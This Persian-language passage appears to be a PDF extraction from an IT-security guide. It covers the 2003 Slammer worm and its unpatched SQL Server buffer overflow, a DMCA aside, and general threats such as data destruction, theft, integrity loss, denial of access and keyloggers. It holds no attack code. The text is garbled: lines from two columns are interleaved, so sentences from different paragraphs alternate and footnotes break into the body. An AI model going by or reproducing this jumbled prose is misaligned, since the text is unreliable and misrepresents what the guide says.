‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺭﺍ ﺧﺪﺷـﻪﺩﺍﺭ ﻛﻨﻴـﺪ‪.‬‬ ‫ﺑﻪ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺯﻳﺮ ﺩﺭﺑﺎﺭﺓ ﻛﺮﻡ ‪ Slammer‬ﻛﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﺳـﺎﻝ‬
‫ﻼ ﻳﻚ ﻧﻔﺮ ﺩﺭ ﺍﺭﻭﭘﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻣﻨﻴـﺖ‬ ‫ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻣﺜ ﹰ‬ ‫‪ ۲۰۰۳‬ﻣﻴﻼﺩﻱ ﺑﺎﻋﺚ ﺧﺮﺍﺑﻲ ﺷﺪﻳﺪ ﺩﺭ ﻛﺎﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺷـﺪ ﺗﻮﺟـﻪ‬
‫ﻲ ﻛـﺴﻲ ﻛـﻪ ﺩﺭ ﻫﻨـﺪ‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﻫﺪﻑ ﺩﺭ ﻫﻨﺪ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧ ﹺ‬ ‫ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﺍﺛﺮ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺮﻡ‪ ،‬ﻛﺸﻮﺭﻫﺎﻱ ﺯﻳـﺎﺩﻱ ﺍﺯ ﺗﻤـﺎﻣﻲ‬
‫ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﻋـﺮﺽ ﻳـﻚ ﺧﻴﺎﺑـﺎﻥ ﺑـﺎ ﺁﻥ ﻫـﺪﻑ ﻓﺎﺻـﻠﻪ ﺩﺍﺭﺩ‬ ‫ﭘﻨﺞ ﻗﺎﺭﺓ ﺟﻬﺎﻥ ﺁﻟﻮﺩﻩ ﺷـﺪﻧﺪ ﻭ ﺑﺨـﺶ ﻋﻤـﺪﺓ ﺧﺮﺍﺑﻴﻬـﺎ ﻧـﺼﻴﺐ‬
‫ﺧﺪﺷﻪﺩﺍﺭ ﻧﻤﺎﻳﺪ‪ .‬ﺗﻬﺪﻳﺪ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻫـﺮ‬ ‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﺪ‪:‬‬
‫ﺟﺎﻱ ﺷﺒﻜﻪ ﺷﺮﻭﻉ ﺷﻮﺩ ﻭ ﺑﻪ ﺳﻤﺖ ﻫﺪﻓﻲ ﻣﻌﻠـﻮﻡ ﻭ ﻣـﺸﺨﺺ‬
‫‪) Slammer‬ﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ‪ Sapphire‬ﻧﻴﺰ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ(‬
‫ﺟﻬﺖﮔﻴﺮﻱ ﻛﻨـﺪ؛ ﻭ ﻫـﺪﻑ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ‬
‫ﺳــﺮﻳﻌﺘﺮﻳﻦ ﻛــﺮﻡ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺍﺳــﺖ ﻛــﻪ ﺩﺭ ﻃــﻮﻝ ﺣﻴــﺎﺕ‬
‫ﺍﻧﺘﺨﺎﺏ ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﺧﻄﺮﻧﺎﻙ ﺑﺎﻋﺚ ﻣﻲﺷﻮﻧﺪ ﻛـﻪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻨﺘﺸﺮ ﺷﺪﻩ‪ .‬ﺑﺎ ﺷـﺮﻭﻉ ﮔـﺴﺘﺮﺵ ﺁﻥ ﺩﺭ ﺳﺮﺍﺳـﺮ‬
‫ﻣﺎ ﻧﺤﻮﺓ ﺗﻔﻜﺮ ﺧﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫـﻴﻢ‪ .‬ﻣـﻲﺗـﻮﺍﻥ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺑﻴﺶ ﺍﺯ ‪ %۹۰‬ﻣﻴﺰﺑﺎﻧﻬﺎﻱ‪ ٤٥‬ﺁﺳﻴﺐﭘﺬﻳﺮ ﺩﺭ ﻋﺮﺽ‬
‫ﮔﻔﺖ ﺍﻳﻦ ﻫﻴﭻ ﺍﺭﺯﺷـﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺁﻳـﻴﻦﻧﺎﻣـﺔ ﺣـﻖ ﺗﻜﺜﻴـﺮ‬ ‫‪ ۱۰‬ﺩﻗﻴﻘﻪ ﺁﻟﻮﺩﻩ ﺷﺪﻧﺪ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﻣﻮﺟﺐ ﺍﺧﺘﻼﻝ ﺩﺭ ﺍﻧﺠﺎﻡ‬
‫‪ Digital Millennium‬ﻃﺮﺍﺣـﻲ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻗﻔـﻞﺷـﻜﻦ‬ ‫ﺩﺍﺩ ﻭ ﺳـﺘﺪﻫﺎﻱ ﻣــﺎﻟﻲ ﻭ ﺍﻣــﻮﺭ ﺣﻤـﻞ ﻭ ﻧﻘــﻞ ﻣﺆﺳــﺴﺎﺕ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﺷﻮﺩ؛ ﭼﺮﺍﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻛﻤﻴﺘﻪﻫﺎﻱ ﻣﻠﻲ ﻭ‬ ‫ﺩﻭﻟﺘﻲ ﺷﺪ ﻭ ﺟـﺎﻳﻲ ﺑـﺮﺍﻱ ﻋﻜـﺲﺍﻟﻌﻤـﻞ ﺍﻧـﺴﺎﻧﻲ ﺑـﺎﻗﻲ‬
‫ﺟﻬﺎﻧﻲ ﺣﻖ ﺗﻜﺜﻴﺮ ﺩﺭ ﺍﻳﻦ ﻣﻮﺿـﻮﻉ ﻭ ﺳـﺎﻳﺮ ﻣـﻮﺍﺭﺩ ﻣـﺮﺗﺒﻂ ﺑـﻪ‬ ‫ﻧﮕﺬﺍﺷﺖ‪...‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﻫﻨﻮﺯ ﻣﺸﻐﻮﻝ ﺗـﺪﻭﻳﻦ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﺟﺮﺍﻳـﻲ‬
‫‪٥١‬‬
‫ﻫﺴﺘﻨﺪ‪.‬‬ ‫‪ Slammer‬ﻗﺒــﻞ ﺍﺯ ﺳــﺎﻋﺖ ‪ ٤٦UTC ۵:۳۰‬ﺭﻭﺯ ﺷــﻨﺒﻪ‬
‫‪ ۲۵‬ﮊﺍﻧﻮﻳــﻪ ‪ ۲۰۰۳‬ﻣــﻴﻼﺩﻱ ﺑــﺎ ﺑﻬــﺮﻩﺑــﺮﺩﺍﺭﻱ ﺍﺯ ﻳــﻚ‬
‫ﺳﻮﻡ‪ :‬ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﺤﻴﻄـﻲ ﻗﺪﺭﺗﻤﻨـﺪ ﺍﻣـﺎ ﭘﻴﭽﻴـﺪﻩ ﺭﺍ ﺑﻮﺟـﻮﺩ‬ ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺳﺮﺭﻳﺰﻱ ﺑـﺎﻓﺮ‪ ٤٧‬ﺑـﺎ ﻧﻔـﻮﺫ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ‬
‫ﺁﻭﺭﺩﻩ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻘﺶ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺮ ﻋﻬﺪﺓ ﭼﻨﺪ ﺑﺎﺯﻳﮕﺮ ﺍﺳﺖ‪.‬‬ ‫ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻛـﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ‪Microsoft SQL‬‬
‫ﻼ ﺍﮔﺮ ﺷـﻤﺎ ﻳﻜـﻲ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ ﻳـﻚ ‪ ISP‬ﺑﺎﺷـﻴﺪ‪ ،‬ﺭﺍﻫﻬـﺎﻱ‬ ‫ﻣﺜ ﹰ‬ ‫‪ Server‬ﻳﺎ ‪Microsoft SQL Desktop Engine‬‬
‫ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺧﻮﺩ ﻭ ﺭﺍﻳﺎﻧـﻪ ﺷﺨـﺼﻲﺗـﺎﻥ ﭘـﻴﺶِﺭﻭ‬ ‫)‪ 2000 (MSDE‬ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﻧﻔﻮﺫ ﻛﺮﺩ ﻭ ﺑﻪ ﺁﺭﺍﻣﻲ‬
‫ﺩﺍﺭﻳﺪ؛ ﻫﺮﭼﻨﺪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ‪ ISP‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ‬
‫ﺍﻗﺪﺍﻡ ﺑﻪ ﺁﻟﻮﺩﻩ ﺳﺎﺧﺘﻦ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣﻴﺰﺑـﺎﻥ ﻧﻤـﻮﺩ‪.‬‬
‫ﺧﻮﺩ ﻳﺎ ﻧﺤﻮﺓ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﺮﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺩﻳﻮﻳﺪ ﻟﻴﭽﻔﻴﻠﺪ‪ ٤٨‬ﺩﺭ ﺟﻮﻻﻱ ﺳـﺎﻝ ‪ ۲۰۰۲‬ﻣـﻴﻼﺩﻱ ﺍﻳـﻦ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ؛ ﺣﺘﻲ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ ﻭ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻧﻴـﺰ ﻗﺒـﻞ ﺍﺯ‬
‫ﺍﮔﺮ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻧﺰﺩﻳﻚ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﻧﻬﺎ ﺑﺎﺷﻴﺪ‪ .‬ﭘﺲ ﺑﺎﻳﺪ ﻳـﻚ‬ ‫ﺍﻧﺘــﺸﺎﺭ ﻛــﺮﻡ ‪ Slammer‬ﻭﺻــﻠﻪﺍﻱ ﺑــﺮﺍﻱ ﺍﺻــﻼﺡ ﺁﻥ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺣﻔﺎﻇﺘﻲ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﺘـﺎﻥ ﺍﺗﺨـﺎﺫ ﻛﻨﻴـﺪ‪ ،‬ﭼﺮﺍﻛـﻪ‬ ‫‪٤٩‬‬
‫ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﺑﻮﺩ‪.‬‬
‫ﻃﺒﻖ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺭﺳﻤﻲ ﻛﺮﻡ ﻣﺬﻛﻮﺭ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺣﺪﺍﻗﻞ ‪ ۷۵‬ﻫﺰﺍﺭ ﺭﺍﻳﺎﻧﺔ ﻣﻴﺰﺑﺎﻥ ﺭﺍ ﺁﻟﻮﺩﻩ ﻛﺮﺩ‬
‫‪50‬‬ ‫‪Moore, Paxson, Savage, Shannon, Staniford‬‬ ‫‪ -‬ﻛﻪ ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﻭﺍﻗﻌﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺳﺖ ‪-‬‬
‫‪and Weaver,"Inside the Slammer Worm,"IEEE‬‬
‫‪Security and Privacy,Vol.1,No.4,July/August‬‬ ‫ﻭ ﻣﻮﺟﺐ ﺍﺧﺘﻼﻝ ﺷﺪﻳﺪ ﺩﺭ ﻛـﺎﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺑـﺮﻭﺯ ﻧﺘـﺎﻳﺞ‬
‫‪2003, pp.33-39.‬‬
‫ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﻧﻈﺮﺍﺕ ﺟﺪﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﺳﻨﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻣﺮﺍﺟـﻊ‬ ‫‪٥١‬‬
‫ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪U.S. Copyright Office Digital Millennium‬‬ ‫‪45‬‬ ‫‪Hosts‬‬
‫‪Copyright Act Study:‬‬ ‫‪46‬‬ ‫‪Universal Time Coordinated‬‬
‫‪http://www.copyright.gov/reports/studies/dmca‬‬ ‫‪47‬‬ ‫‪Buffer Overflow Vulnerability‬‬
‫‪/dmca_study.html‬‬ ‫‪48‬‬ ‫‪David Litchfield‬‬
‫‪DMCA:‬‬ ‫‪49‬‬ ‫‪http://www.microsoft.com/security/‬‬
‫‪http://www.copyright.gov/legislation/hr2281.pdf‬‬ ‫‪slammer.asp‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٨‬‬

‫ﺛﺒﺖ ﻛﻠﻴﺪﻫﺎ‪ -‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﻨﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ‬ ‫ﻣﻲﺩﺍﻧﻴﺪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺩﻧﻴﺎﻱ ﺑﻴﺮﻭﻥ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻧﺘﻮﺍﻧﻴـﺪ‬
‫ﺷﻤﺎ ﻧﺼﺐ ﺷﻮﻧﺪ ﻛﻪ ﻓﺸﺮﺩﻩﺷﺪﻥ ﺩﻛﻤﻪﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴـﺪ‬ ‫ﺗﻤﺎﻡ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺧﻨﺜﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺗﻮﺳﻂ ﺷﻤﺎ ﺭﺍ ﺛﺒﺖ ﻛـﺮﺩﻩ ﻭ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﻳﮕـﺮ‬ ‫ﻣﺨــﺎﻃﺮﺍﺕ ﻣﺤﺘﻤــﻞ ﺩﺭ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﭼﻴــﺴﺘﻨﺪ؟ ﺍﮔــﺮ ﻫــﻴﭻ‬
‫ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﻣﻨـﺎﺑﻊ‬
‫‪٥٢‬‬
‫ﻣﻼﺣﻈﺔ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﻧﺪﺍﺩﻩ ﺑﺎﺷﻴﺪ ﺑﻌﻀﻲ ﻧﺘﺎﻳﺠﻲ ﻛـﻪ‬
‫ﺧﺎﺭﺟﻲ ﻧﻈﻴﺮ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﻨﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﻣﺤﺎﻓﻈﺖﺷﺪﻩ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻧﻘــﻞ ﻭ ﺍﻧﺘﻘــﺎﻻﺕ ﻣــﺎﻟﻲ‪ ،‬ﻭ ﻳــﺎ ﺩﺭﻳﺎﻓــﺖ‬ ‫ﺗﺨﺮﻳﺐ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﺩﺍﺩﻩ ﻫﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﺩﭼـﺎﺭ ﺍﺷـﻜﺎﻝ ﻛﻨـﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟـﺖ‬ ‫ﻻ ﺍﻣﻜـﺎﻥ‬‫ﺷﻤﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺣـﺬﻑ ﺷـﻮﻧﺪ‪ .‬ﺍﻟﺒﺘـﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺳﺎﺭﻕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻧﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،٥٣‬ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ‬ ‫ﻻ‬
‫ﺑﺎﺯﻳﺎﺑﻲ ﺁﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﻓﺮﺁﻳﻨﺪﻱ ﺯﻣﺎﻥﺑـﺮ ﻭ ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﺍﻋﺘﺒﺎﺭﻱ‪ ،‬ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻭ ﺩﺭ ﺁﻳﻨﺪﻩ‬ ‫ﻧﺎﻗﺺ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﮔﺮ ﻳﻚ ﻣﺆﺳﺴﺔ ﺩﻭﻟﺘﻲ ﺑﺎﺷﻴﺪ ﻣﻤﻜـﻦ‬
‫ﺑﺮﺍﻱ ﻣﻨﺎﻓﻊ ﺷﺨﺼﻲ ﺧﻮﺩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬ ‫ﺍﺳﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﺘﺎﻥ ﺣﻴﻦ ﺍﻳﻦ ﺩﻭﺭﻩ ﺩﭼﺎﺭ ﺍﺧﺘﻼﻝ ﺷﻮﺩ‪.‬‬

‫ﻣﻨﻊ ﺩﺳﺘﺮﺳﻲ‪ - ٥٤‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺷـﻤﺎ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ‬ ‫ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﻘـﺾ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ‪ -‬ﻣﻤﻜـﻦ‬
‫ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﻣﺤﺮﻭﻡ ﺷـﻮﻳﺪ‪ ،‬ﺣﺘـﻲ ﺍﮔـﺮ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﺍﺳﺖ ﺍﺯ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﻼﻓﺎﺻﻠﻪ ﻳـﺎ ﺑـﺎ ﺗـﺄﺧﻴﺮ ﻣﻄﻠـﻊ‬
‫ﻼ ﺍﻣﻜـﺎﻥ ﺩﺍﺭﺩ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﺩﺭ‬ ‫ﭘﺎﻙ ﻧﺸﺪﻩ ﺑﺎﺷﻨﺪ‪ .‬ﻣﺜ ﹰ‬ ‫ﺷﻮﻳﺪ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﺍﻳﻨﻜـﻪ ﻣﺘﻮﺟـﻪ ﺷـﻮﻳﺪ ﭼـﻪ ﻛـﺴﻲ‬
‫ﻗﺎﻟﺒﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩﺍﻱ ﻇﺎﻫﺮ ﺷـﻮﻧﺪ ﻭ ﺗﻨﻬـﺎ ﻣﻬـﺎﺟﻢ‬ ‫ﺩﺍﺩﻩﻫﺎﻱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﮔﺮﻓﺘـﻪ‪ ،‬ﭼـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬ ‫ﺍﺧﺘﻴﺎﺭ ﺍﻭﺳﺖ‪ ،‬ﻳﺎ ﺑﺎ ﺁﻧﻬﺎ ﭼﻪ ﻛﺎﺭﻫـﺎﻳﻲ ﺍﻧﺠـﺎﻡ ﺧﻮﺍﻫـﺪ ﺩﺍﺩ‬
‫ﻼ ﻣﺠﺰﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺣﺠﻢ ﻭﺳﻴﻌﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ‬ ‫ﻛﺎﻣ ﹰ‬
‫ﻫﺰﻳﻨﺔ ﺗﺮﻣﻴﻢ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺯ ﻫـﺮ ﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﺣﻤـﻼﺕ ﻗﺎﺑـﻞ‬ ‫ﺷﻤﺎ ﺑـﻪ ﺳـﺮﻗﺖ ﺭﻓﺘـﻪ ﺑﺎﺷـﺪ ﺑـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩ ﺳـﺎﺭﻕ‬
‫ﻣﻼﺣﻈﻪ ﺍﺳﺖ ﻭ ﺑﺎﺯﻳﺎﺑﻲ ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﺎﻣﻤﻜﻦ ﺑﻨﻈﺮ ﻣﻲﺁﻳـﺪ‪.‬‬ ‫ﺍﻃﻼﻋﺎﺕ ﻛﻠﻴﺪﻱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ ﻭ ﻫﻤـﻴﻦ ﺍﻣـﺮ‬
‫ﺍﮔﺮ ﺷﻤﺎ ﻣﺪﻳﺮ ﻳﻚ ﺭﺳﺎﻧﺔ ﺗﺒﻠﻴﻐﺎﺗﻲ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑـﻪ ﻣﻨـﺎﺑﻊ ﺩﺍﺩﻩﺍﻱ‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺠﻲ ﻧﺎﻣﻌﻠﻮﻡ ﻭ ﺗﺎ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺧﻄﺮﻧـﺎﻙ ﺩﺭ ﭘـﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﻭﺍﺑـﺴﺘﮕﻲ ﺷـﺪﻳﺪ ﺩﺍﺭﺩ‪ ،‬ﻳـﻚ ﺣﻤﻠـﺔ ﻣﺨـﺮﺏ‬ ‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻣﻲ ﺗﻮﺍﻧﺪ ﻣﻮﺟﺐ ﻭﺭﺷﻜﺴﺘﮕﻲ ﻣﺆﺳﺴﻪ ﺷﻤﺎ ﮔﺮﺩﺩ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻴﺪ ﻛﻪ ﻛﺮﻡ ‪ Slammer‬ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺭﺍ ﺁﻟﻮﺩﻩ ﻣﻲﻛـﺮﺩ ﻛـﻪ‬ ‫ﻧﻘﺾ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧﻪ‬
‫ﻭﺻﻠﺔ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺭﻭﻱ ﺁﻧﻬﺎ ﻧﺼﺐ ﻧﺸﺪﻩ ﺑﻮﺩ‪.‬‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﺷﻤﺎ ﺗﻐﻴﻴﺮ ﻛﻨﻨـﺪ ﻭ ﺩﺳـﺘﻜﺎﺭﻱ‬
‫ﺷﻮﻧﺪ‪ .‬ﺑﺮ ﺍﺳﺎﺱ ﻧﻮﻉ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ‬
‫ﻳﻜــﻲ ﺍﺯ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻛــﻪ ﺑــﻴﺶ ﺍﺯ ﻳﻜــﺴﺎﻝ ﻓﻌﺎﻟﻴــﺖ‬ ‫ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﺩﺳﺘﻜﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻘﻄﻌﻲ ﻳﺎ ﺩﺭﺍﺯﻣﺪﺕ ﺑﺎﺷـﺪ‪.‬‬
‫ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺩﺍﺷﺖ ﺭﻭﺷﻬﺎﻱ ﻧﻮﻳﻨﻲ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻛﺸﻴﺪ ﻛـﻪ ﺑـﺎ‬ ‫ﺍﮔﺮ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺷﺎﻣﻞ ﺳﻮﺍﺑﻖ ﻣﺎﻟﻲ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻣـﺸﺘﺮﻳﺎﻥ‪،‬‬
